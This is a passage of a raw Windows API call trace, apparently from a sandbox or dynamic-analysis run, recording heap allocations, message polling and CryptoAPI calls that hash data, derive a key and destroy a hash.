(in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.376] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.376] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.376] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.376] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.376] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.376] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.376] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.376] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0032.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0032.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.378] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0032.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.379] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0032.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.379] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889490 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.380] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889628 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0032.380] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897f0 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8b0 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0032.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0032.381] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.381] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0032.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0032.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0032.383] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.383] CryptDestroyHash (hHash=0x7c2100) returned 1 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0032.383] RtlAllocateHeap 